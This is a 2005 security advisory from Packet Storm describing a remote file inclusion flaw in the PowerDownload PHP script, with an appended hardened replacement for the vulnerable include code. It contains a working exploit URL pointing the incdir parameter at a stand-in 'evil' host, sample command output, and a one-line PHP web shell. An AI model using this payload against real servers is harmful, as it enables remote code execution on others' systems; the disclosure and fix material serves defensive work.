PowerDownloadExec.txt

2005-08-14T00:00:00
ID PACKETSTORM:39362
Type packetstorm
Reporter soulblack.com.ar
Modified 2005-08-14T00:00:00

Description

                                        
============================================================  
  
============================================================  
Title: PowerDownload Remote File Inclusion.  
Vulnerability discovery: SoulBlack - Security Research -  
http://soulblack.com.ar  
Date: 31/05/2005  
Severity: High. Remote Users Can Execute Arbitrary Code.  
Affected version: v3.0.2 & v3.0.3  
Vendor: http://www.powerscripts.org/  
============================================================  
  
============================================================  
  
* Summary *  
  
PowerDownload is a PHP and MySQL based download script.  
  
-------------------------------------------------------------  
  
* Problem Description *  
  
The bug resides in the $incdir variable in pdl-inc/pdl_header.inc.php.  
  
Vulnerable Code  
  
// Include required Files  
// $incdir is only given a default when it is not already set; it is never  
// validated. With register_globals enabled, a request parameter named incdir  
// therefore becomes the prefix of every require() below.  
if(!isset($incdir)) $incdir = "";  
require($incdir."pdl-inc/pdl_config.inc.php");  
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");  
require($incdir."pdl-inc/pdl_functions.inc.php");  
  
  
/*  
  
http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a  
  
Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon  
  
*/  
  
/*  
-------  
cmd.gif  
-------  
  
<?  
system($cmd);  
?>  
  
*/  
  
-------------------------------------------------------------  
  
* Fix *  
  
Contact the Vendor.  
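As an added example that is not part of the advisory or the vendor's code, the following is a hardened replacement for the include block quoted above: the include root is computed from the file's own location instead of being taken from whatever $incdir already holds, and the database type is restricted to a known list before it is spliced into a file name (the list of backends is an assumption).

```php
<?php
// Hardened replacement for the include block in pdl-inc/pdl_header.inc.php
// (added example, not the vendor's code).
//
// Root cause of the advisory: $incdir was only defaulted when it was *not*
// already defined, so with register_globals on a request parameter
// "incdir=http://..." became the prefix of every require() and PHP fetched the
// include from a remote host. The fix is to never derive the include root
// from request state at all.

// pdl_header.inc.php lives in pdl-inc/, so the application root is one level
// up. Unconditional assignment: anything register_globals injected is
// overwritten, and the prefix can never carry a URL scheme.
$incdir = dirname(__FILE__) . '/../';

require($incdir . 'pdl-inc/pdl_config.inc.php');

// $config_sql_type comes from the config file rather than the request, but it
// is still used to build a file name, so constrain it to the backends that
// actually ship. Assumption: only the MySQL class exists; extend if needed.
$allowed_db_types = array('mysql');
$sql_type = strtolower((string) $config_sql_type);
if (!in_array($sql_type, $allowed_db_types, true)) {
    die('Unsupported database type in pdl_config.inc.php');
}

require($incdir . 'pdl-inc/pdl_db_class_' . $sql_type . '.inc.php');
require($incdir . 'pdl-inc/pdl_functions.inc.php');
?>
```

Independently of the code change, register_globals = Off removes the input path and allow_url_fopen = Off (allow_url_include = Off on PHP 5.2 and later) stops require() from fetching remote files, which is why both are worth setting in php.ini as defense in depth.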
  
-------------------------------------------------------------  
  
* References *  
  
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt  
  
-------------------------------------------------------------  
  
* Credits *  
  
Vulnerability reported by SoulBlack Security Research  
  
============================================================  
  
--  
SoulBlack - Security Research  
http://www.soulblack.com.ar  